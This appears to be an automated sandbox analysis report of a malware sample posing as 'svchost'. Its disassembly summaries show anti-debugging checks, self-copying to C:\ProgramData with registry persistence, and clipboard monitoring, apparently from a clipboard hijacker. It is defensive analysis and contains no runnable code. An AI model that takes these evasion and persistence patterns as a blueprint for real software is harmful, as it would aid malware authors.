                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                      • String ID: invalid string position
                                      • API String ID: 1785806476-1799206989
                                      • Opcode ID: 4f688eb7b139980606b6249c5054c7ec464165af03321488a7c1d0b7f26760dd
                                      • Instruction ID: c0dfb9ad1d84408aca3c0bc4771f70511c2b5052637a80a5b2d9d5061a7f9e99
                                      • Opcode Fuzzy Hash: 4f688eb7b139980606b6249c5054c7ec464165af03321488a7c1d0b7f26760dd
                                      • Instruction Fuzzy Hash: D23199B4D0021ADFCB08DF98C5809AEBBB1FF89304F108959E9256B385C734EA41CF95
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: 5$EOS
                                      • API String ID: 909875538-1935795245
                                      • Opcode ID: 5d19d25491994af5a54c3fabd4302859563863366bd15e4f2d1bcdf2a326ec21
                                      • Instruction ID: cbb266d7676478089d8eb310e371b3e9da3167fd0b533db38114e6f4d1a4e4ac
                                      • Opcode Fuzzy Hash: 5d19d25491994af5a54c3fabd4302859563863366bd15e4f2d1bcdf2a326ec21
                                      • Instruction Fuzzy Hash: F001C471940308BBDB00DB75DC42BEA7364AB09704F408039F8027B1C2E678D61596A9
                                      APIs
                                        • Part of subcall function 004147AA: __getptd.LIBCMT ref: 004147B0
                                        • Part of subcall function 004147AA: __getptd.LIBCMT ref: 004147C0
                                      • __getptd.LIBCMT ref: 00416006
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00416014
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: csm
                                      • API String ID: 803148776-1018135373
                                      • Opcode ID: 7bb9c1e30fbc5ae72e6ed50af7ca16e765d77639bd1419dbdef8fde2e0cfdfc7
                                      • Instruction ID: de1ba10ac35249198c25df3b2f6096fc92783805510d7df63b2757107bfbf943
                                      • Opcode Fuzzy Hash: 7bb9c1e30fbc5ae72e6ed50af7ca16e765d77639bd1419dbdef8fde2e0cfdfc7
                                      • Instruction Fuzzy Hash: 9C014B34800305DACF34EF25C4446EEBBB6AF18311F25442FE445A6292DB3EC9C4CB59

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AddClipboardFormatListener$ChangeClipboardChain$RemoveClipboardFormatListener$SetClipboardViewer$cC0inHj$user32.dll
                                      • API String ID: 0-2614838119
                                      • Opcode ID: 46e57fd81572760438a23d69b1a289466db8ea427554a731aa1a13a6ab7f929a
                                      • Instruction ID: e4e5dd0de9f09d90ee084e7cb90bd22076d3a6f0aa843fabeb84720459f47b48
                                      • Opcode Fuzzy Hash: 46e57fd81572760438a23d69b1a289466db8ea427554a731aa1a13a6ab7f929a
                                      • Instruction Fuzzy Hash: BF717D74A442589BEB209F20DC4DBEA7BB4EB14305F4484BBE44A762E1C77C8AC5DF19

                                      Control-flow Graph

                                      APIs
                                      • IsDebuggerPresent.KERNEL32(EED2DB5A), ref: 0040DEEA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DebuggerPresent
                                      • String ID: --check$--config$--run
                                      • API String ID: 1347740429-1715824448
                                      • Opcode ID: 4998038e9da7e4c649bf71f5e2e5df3312fbbd31ea5429612011932821bd840d
                                      • Instruction ID: a6e4f3225be8be52f133a3bd3a6e0bcae41296a009743188dca9600d065854ff
                                      • Opcode Fuzzy Hash: 4998038e9da7e4c649bf71f5e2e5df3312fbbd31ea5429612011932821bd840d
                                      • Instruction Fuzzy Hash: D4518871D04218DBDB24CFA6D844BEEBBB4BB08314F14862AE811B73C0D37D9905CBA9

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040111B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040113C
                                      • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 00401155
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 0040115C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleInformationModuleProcQuery
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 2292878059-3301033669
                                      • Opcode ID: 1c86e47dd1fd906bbdcf03037e39a74239d4cfa1ab3ab8fc813cf9e7548c363e
                                      • Instruction ID: a6687a9151404b893926094712e7bd645b6c75322a1efd05145472f72e85e0e4
                                      • Opcode Fuzzy Hash: 1c86e47dd1fd906bbdcf03037e39a74239d4cfa1ab3ab8fc813cf9e7548c363e
                                      • Instruction Fuzzy Hash: 6101ADB0E40208BBDF10AFF0AC0DBDE7B789B08709F104176E611B62E1D2795A44DB2A

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 004010A4
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004010C5
                                      • GetCurrentThread.KERNEL32 ref: 004010E2
                                      • NtSetInformationThread.NTDLL(?,00000011,00000000,00000000), ref: 004010F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Thread$AddressCurrentHandleInformationModuleProc
                                      • String ID: 7=-55V-55$v={.=q7/8;6*=287|1;.*-
                                      • API String ID: 119525482-1927140540
                                      • Opcode ID: 2435a75c996f34b6889767234aba8995ae01aaa7964b36a464df7492c5cc838d
                                      • Instruction ID: 0b82ffc8d0ca1f8d0bdf6dd75ae4657ab6c6ae2d9d09e3d18241b6bc1c87c415
                                      • Opcode Fuzzy Hash: 2435a75c996f34b6889767234aba8995ae01aaa7964b36a464df7492c5cc838d
                                      • Instruction Fuzzy Hash: 69016DB4D40308BBDB10AFA0DC4A7DE7B74AB08706F10C07AA945626D1D6785A84DB5A

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00401090: GetModuleHandleA.KERNEL32(00000000), ref: 004010A4
                                        • Part of subcall function 00401090: GetProcAddress.KERNEL32(00000000,00000000), ref: 004010C5
                                        • Part of subcall function 00401090: NtSetInformationThread.NTDLL(?,00000011,00000000,00000000), ref: 004010F5
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                      • _wcsrchr.LIBCMT ref: 0040DE5E
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0040DE7E
                                      • SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Module$AddressCurrentDirectoryErrorFileHandleInformationModeNameProcThread_wcsrchr
                                      • String ID:
                                      • API String ID: 1734398998-0
                                      • Opcode ID: 857e7daad55e3966da8993c541fa6c9fdcddb044e01855e595ba07532dd17d0c
                                      • Instruction ID: d51f74107fde24b1b44d4026587f8350a487b3b151098653a9adb7166d01a02a
                                      • Opcode Fuzzy Hash: 857e7daad55e3966da8993c541fa6c9fdcddb044e01855e595ba07532dd17d0c
                                      • Instruction Fuzzy Hash: FC016770D002089BE750DFB1DD06BED7774AF08705F00407DA745B61D1EE759A55CB69

                                      Control-flow Graph
                                      control_flow_graph 135 40df97-40dfb0 call 40de20 138 40dfb5-40dfda GetCommandLineW CommandLineToArgvW 135->138 139 40dfe2 138->139 140 40dfdc-40dfe0 138->140 142 40dfe2 call 40d7f0 139->142 140->139 141 40dfec-40dff0 140->141 144 40dff6-40e00c call 40f476 141->144 145 40e0ab-40e0af 141->145 143 40dfe7 142->143 143->145 151 40e04e-40e064 call 40f476 144->151 152 40e00e-40e019 144->152 147 40e0b1-40e0b5 LocalFree 145->147 148 40e0bb-40e119 145->148 147->148 159 40e0a6 151->159 160 40e066-40e071 151->160 154 40e01b-40e031 call 40f476 152->154 155 40e03c-40e044 call 405b10 152->155 154->155 166 40e033-40e039 154->166 162 40e049-40e04c 155->162 165 40e0a6 call 40d7f0 159->165 163 40e073-40e089 call 40f476 160->163 164 40e094-40e0a4 call 405e10 160->164 162->145 163->164 171 40e08b-40e091 163->171 164->145 165->145 166->155 171->164
                                      APIs
                                        • Part of subcall function 0040DE20: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                        • Part of subcall function 0040DE20: _wcsrchr.LIBCMT ref: 0040DE5E
                                        • Part of subcall function 0040DE20: SetCurrentDirectoryW.KERNEL32(?), ref: 0040DE7E
                                        • Part of subcall function 0040DE20: SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      • GetCommandLineW.KERNEL32(00000000), ref: 0040DFBC
                                      • CommandLineToArgvW.SHELL32(?,00000000), ref: 0040DFCD
                                      • __wcsicoll.LIBCMT ref: 0040E002
                                      • __wcsicoll.LIBCMT ref: 0040E027
                                      • LocalFree.KERNEL32(00000000), ref: 0040E0B5
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CommandLine__wcsicoll$ArgvCurrentDirectoryErrorFileFreeLocalModeModuleName_wcsrchr
                                      • String ID:
                                      • API String ID: 376514278-0
                                      • Opcode ID: 042f7be7ee89fd1085477983af551a410b2ae299cdc2ed00dde61f87e02e1ac2
                                      • Instruction ID: 8b7a6b8f356ce4702e62b5b31cb6d48a6c6ddf238daab223e574e510f6bfc381
                                      • Opcode Fuzzy Hash: 042f7be7ee89fd1085477983af551a410b2ae299cdc2ed00dde61f87e02e1ac2
                                      • Instruction Fuzzy Hash: 52010471D04219CBDB24DFE5D9087EEBBB4FB08315F20862AD402B22D0C77D591ADB6A

                                      Control-flow Graph
                                      control_flow_graph 172 40dfa6-40dfb0 call 40de20 175 40dfb5-40dfda GetCommandLineW CommandLineToArgvW 172->175 176 40dfe2 175->176 177 40dfdc-40dfe0 175->177 179 40dfe2 call 40d7f0 176->179 177->176 178 40dfec-40dff0 177->178 181 40dff6-40e00c call 40f476 178->181 182 40e0ab-40e0af 178->182 180 40dfe7 179->180 180->182 188 40e04e-40e064 call 40f476 181->188 189 40e00e-40e019 181->189 184 40e0b1-40e0b5 LocalFree 182->184 185 40e0bb-40e119 182->185 184->185 196 40e0a6 188->196 197 40e066-40e071 188->197 191 40e01b-40e031 call 40f476 189->191 192 40e03c-40e044 call 405b10 189->192 191->192 203 40e033-40e039 191->203 199 40e049-40e04c 192->199 202 40e0a6 call 40d7f0 196->202 200 40e073-40e089 call 40f476 197->200 201 40e094-40e0a4 call 405e10 197->201 199->182 200->201 208 40e08b-40e091 200->208 201->182 202->182 203->192 208->201
                                      APIs
                                        • Part of subcall function 0040DE20: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                        • Part of subcall function 0040DE20: _wcsrchr.LIBCMT ref: 0040DE5E
                                        • Part of subcall function 0040DE20: SetCurrentDirectoryW.KERNEL32(?), ref: 0040DE7E
                                        • Part of subcall function 0040DE20: SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      • GetCommandLineW.KERNEL32(00000000), ref: 0040DFBC
                                      • CommandLineToArgvW.SHELL32(?,00000000), ref: 0040DFCD
                                      • __wcsicoll.LIBCMT ref: 0040E002
                                      • __wcsicoll.LIBCMT ref: 0040E027
                                      • LocalFree.KERNEL32(00000000), ref: 0040E0B5
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CommandLine__wcsicoll$ArgvCurrentDirectoryErrorFileFreeLocalModeModuleName_wcsrchr
                                      • String ID:
                                      • API String ID: 376514278-0
                                      • Opcode ID: 0c1f40a89095485505fd396e34828f8e9ff31bf2fc1e7971dde13b94f3ebcb04
                                      • Instruction ID: ae0a6c04ace250e6ec1f5edccdaa0bc9745cba344c46f71d870c8753c6498d62
                                      • Opcode Fuzzy Hash: 0c1f40a89095485505fd396e34828f8e9ff31bf2fc1e7971dde13b94f3ebcb04
                                      • Instruction Fuzzy Hash: 2E014471C04218CBDB24DFE5D8087EEBBB4FB08315F10422AD802B3280C77D5919CBAA

                                      Control-flow Graph
                                      control_flow_graph 209 411447-411458 call 41141c ExitProcess
                                      APIs
                                      • ___crtCorExitProcess.LIBCMT ref: 0041144F
                                        • Part of subcall function 0041141C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00411454,00000000,?,00410BC2,000000FF,0000001E,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000), ref: 00411426
                                        • Part of subcall function 0041141C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00411436
                                      • ExitProcess.KERNEL32 ref: 00411458
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                      • String ID:
                                      • API String ID: 2427264223-0
                                      • Opcode ID: b4110d07eca1f61fbf2879656b9bbfd95852c39ef410a6f7b787a55806ce86ec
                                      • Instruction ID: 97cd00bbafddeea18524e87ba9999e83b9df1a82b7e94daaf0906db5b7771dd5
                                      • Opcode Fuzzy Hash: b4110d07eca1f61fbf2879656b9bbfd95852c39ef410a6f7b787a55806ce86ec
                                      • Instruction Fuzzy Hash: 6DB09B310001087BCB012F12DC098893F15DB407507148035F50C05031DF71ADD5D589

                                      Control-flow Graph
                                      control_flow_graph 212 41169f-4116ab call 41155f 214 4116b0-4116b4 212->214
                                      APIs
                                      • _doexit.LIBCMT ref: 004116AB
                                        • Part of subcall function 0041155F: __lock.LIBCMT ref: 0041156D
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(0041E0B0,00000020,004116C6,00000000,00000001,00000000,?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115A9
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115BA
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(-00000004,?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115E0
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115F3
                                        • Part of subcall function 0041155F: DecodePointer.KERNEL32(?,00411706,000000FF,?,00412722,00000011,00000000,?,0041045D,0000000D), ref: 004115FD
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DecodePointer$__lock_doexit
                                      • String ID:
                                      • API String ID: 3343572566-0
                                      • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                      • Instruction ID: 69d7dd60be9393ca9a75932822da633d8709a72556d2422c147b43d379804c5d
                                      • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                      • Instruction Fuzzy Hash: 78B0923258020C33DA202646AC03F463A0E87C0B64F250022FA0D1D1A2A9A2A9A1808A

                                      Control-flow Graph
                                      control_flow_graph 332 40d7f0-40d897 call 4123e0 * 4 GetModuleFileNameW 341 40d8a0-40d8be call 40eedb 332->341 342 40d899-40d89b 332->342 348 40d8c0-40d8c2 341->348 349 40d8c7-40d8f4 call 40eedb 341->349 343 40de04-40de11 call 40e542 342->343 348->343 352 40d904-40d906 349->352 353 40d8f6-40d902 349->353 352->343 353->352 354 40d90b-40d94c call 40f501 SHGetFolderPathW 353->354 357 40d967-40d9ac call 40f5ce * 2 CreateDirectoryW 354->357 358 40d94e-40d964 call 40f643 354->358 365 40d9c2-40da36 SetFileAttributesW call 40f5ce * 3 CopyFileW 357->365 366 40d9ae-40d9b9 GetLastError 357->366 358->357 374 40da38-40da3a 365->374 375 40da3f-40dab7 SetFileAttributesW call 40f5ce * 2 RegCreateKeyExW 365->375 366->365 367 40d9bb-40d9bd 366->367 367->343 374->343 380 40db4b-40db54 375->380 381 40dabd-40dad2 375->381 383 40dc12-40dc1b 380->383 384 40db5a-40db7e RegCreateKeyExW 380->384 382 40dad8-40daf7 381->382 382->382 385 40daf9-40db45 RegSetValueExW RegCloseKey 382->385 387 40dc32-40dc3b 383->387 388 40dc1d-40dc2c call 40d6d0 383->388 384->383 386 40db84-40db99 384->386 385->380 392 40db9f-40dbbe 386->392 390 40dc44-40dc62 call 40eedb 387->390 391 40dc3d-40dc3f 387->391 388->387 397 40dd85-40dde2 call 4123e0 CreateProcessW 390->397 398 40dc68-40dc86 call 40eedb 390->398 391->343 392->392 395 40dbc0-40dc0c RegSetValueExW RegCloseKey 392->395 395->383 403 40de02 397->403 404 40dde4-40de00 CloseHandle * 2 397->404 398->397 405 40dc8c-40dca8 398->405 403->343 404->343 406 40dcae-40dcf4 405->406 406->406 407 40dcf6-40dd12 406->407 408 40dd18-40dd5e 407->408 408->408 409 40dd60-40dd7f CopyFileW SetFileAttributesW 408->409 409->397
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset$FileModuleName_wcsrchr
                                      • String ID: " --run$.exe$C:\ProgramData$D
                                      • API String ID: 4110263760-856358560
                                      • Opcode ID: 950a9b0d5e19babd959c84d076f819a4769d06f360780ed7d77a3cdf4963b18b
                                      • Instruction ID: 5e5d0b140630b177179d526cbad5a59638b82476de5506c4c87b912bd79cfa18
                                      • Opcode Fuzzy Hash: 950a9b0d5e19babd959c84d076f819a4769d06f360780ed7d77a3cdf4963b18b
                                      • Instruction Fuzzy Hash: 80F15271E443189BDB20DF60CC45BEAB774AF49704F0081E9E20DB6681EBB55AD8CF5A
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004053DB
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0040540A
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806907919.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AvailableClipboardCountFormatTick
                                      • String ID:
                                      • API String ID: 2629628197-0
                                      • Opcode ID: ea5d661e767c446a57565c884fad5e5dc5843c3bfe645af674496e95f4a1b0b0
                                      • Instruction ID: e3f2d7c064d7d99d206c5680652346840c7ffd9ef1d315a872dd3332421114f8
                                      • Opcode Fuzzy Hash: ea5d661e767c446a57565c884fad5e5dc5843c3bfe645af674496e95f4a1b0b0
                                      • Instruction Fuzzy Hash: 84914A71D00218DFCB14DFAAD848AEFBBB5FF48305F10856AE51AA7290D7389945CF29
                                      APIs
                                        • Part of subcall function 0040E170: _rand.LIBCMT ref: 0040E175
                                        • Part of subcall function 0040E170: _rand.LIBCMT ref: 0040E17F
                                      • AddClipboardFormatListener.USER32(00000000), ref: 0040595B
                                      • DestroyWindow.USER32(00000000), ref: 00405969
                                      • GetLastError.KERNEL32 ref: 0040599F
                                      • DestroyWindow.USER32(00000000), ref: 004059AD
                                      • WaitForSingleObject.KERNEL32(00000000,00000000,EED2DB5A), ref: 004059D2
                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00405A0F
                                      • TranslateMessage.USER32(?), ref: 00405A1D
                                      • DispatchMessageA.USER32(?), ref: 00405A27
                                      • Sleep.KERNEL32(00000014), ref: 00405A31
                                      • RemoveClipboardFormatListener.USER32(00000000), ref: 00405A67
                                      • DestroyWindow.USER32(00000000), ref: 00405A71
                                      • ReleaseMutex.KERNEL32(00000000), ref: 00405A8E
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.1805017442.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000012.00000002.1804852219.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1805708136.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806403962.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 00000012.00000002.1806606991.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
